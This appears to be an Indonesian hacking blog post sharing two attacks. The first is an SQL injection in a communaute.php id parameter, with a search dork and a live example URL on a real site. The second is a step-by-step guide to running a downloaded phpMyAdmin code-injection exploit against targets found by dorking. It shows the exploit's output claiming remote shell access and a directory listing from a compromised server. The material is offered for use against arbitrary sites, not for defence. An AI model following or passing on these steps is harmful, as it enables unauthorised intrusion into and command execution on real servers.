Communautes.php(id) SQL Injection Vulnerability
PhpMyAdmin Injection Code
1.Communautes.php(id) SQL Injection Vulnerability
===================================================Title : Communautes.php(id) SQL Injection Vulnerability
Author : Kimmonosz
From : Tangerang, Indonesia
Dork : inurl:communaute.php?id=
====================================================
Vulnerability File :
www.targetnya.com/communate.php?id=[SQLi]
Example :
http://www3.nfb.ca/aventures/wapikonimobile/excursionWeb/communaute.php?id='6
Note : Communautés adalah bahasa Prancis yang artinya komunitas.
COMMUNITY : IHT,ICT,MCC,HC,FH,YCL,JC,Any more...
Thanks to : Smua hacker yang ada di Indonesia ^.^
*************************************************************
2.PhpMyAdmin Injection Code
Disini gw share ilmu dari salah satu member Fasthacker.Disini gw share POC Phpmyadmin Injection Code.
1. Download exploit nya di milw0rm
Code:
http://milw0rm.com/exploits/download/8921
2.Abis di Download, ubah permission dengan cara
Code:
chmod 755 nama_file.sh
3. kalo kamu pake linux kamu harus install curl caranya :
Code:
sudo apt-get install curl
4. googling :
Code:
inurl:phpmyadmin
5. contoh nya :
Code:
wishnu@stupid:~/Desktop$ ./myadmin.sh http://**********.****.**/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/myadmin.sh.25692.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://*********.*****.**//config/config.inc.php?c=ls+-l+/
http://***************//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentestergmail.com
dan hasilnya :
Code:
total 112
drwxr-xr-x 2 root root 4096 Mar 11 06:47 bin
drwxr-xr-x 3 root root 4096 Apr 16 07:24 boot
lrwxrwxrwx 1 root root 11 Feb 19 20:07 cdrom -> media/cdrom
drwxr-xr-x 13 root root 13840 May 31 08:21 dev
drwxr-xr-x 96 root root 4096 Jun 11 06:44 etc
drwxr-xr-x 5 root root 4096 May 4 13:49 home
lrwxrwxrwx 1 root root 32 Feb 20 07:00 initrd.img -> boot/initrd.img-2.6.27-11-server
lrwxrwxrwx 1 root root 31 Feb 19 20:09 initrd.img.old -> boot/initrd.img-2.6.27-7-server
drwxr-xr-x 13 root root 12288 Apr 16 07:23 lib
drwx------ 2 root root 16384 Feb 19 20:07 lost+found
drwxr-xr-x 3 root root 4096 Feb 19 20:07 media
drwxr-xr-x 14 root root 4096 May 18 22:39 mnt
drwxr-xr-x 2 root root 4096 Feb 19 20:08 opt
dr-xr-xr-x 115 root root 0 May 31 08:21 proc
drwxr-xr-x 9 root root 4096 May 19 14:47 root
drwxr-xr-x 2 root root 4096 Apr 16 07:23 sbin
-rw------- 1 root root 31903 Feb 19 23:34 sql1qPPmS
drwxr-xr-x 2 root root 4096 Feb 19 20:08 srv
drwxr-xr-x 12 root root 0 May 31 08:21 sys
drwxrwxrwt 5 root root 4096 Jun 14 05:32 tmp
drwxr-xr-x 11 root root 4096 Feb 19 20:14 usr
drwxr-xr-x 15 root root 4096 Feb 19 20:26 var
lrwxrwxrwx 1 root root 29 Feb 20 07:00 vmlinuz -> boot/vmlinuz-2.6.27-11-server
lrwxrwxrwx 1 root root 28 Feb 19 20:09 vmlinuz.old -> boot/vmlinuz-2.6.27-7-server
![[Valid Atom 1.0]](valid-atom.png "Validate my Atom 1.0 feed")
Tidak ada komentar:
Posting Komentar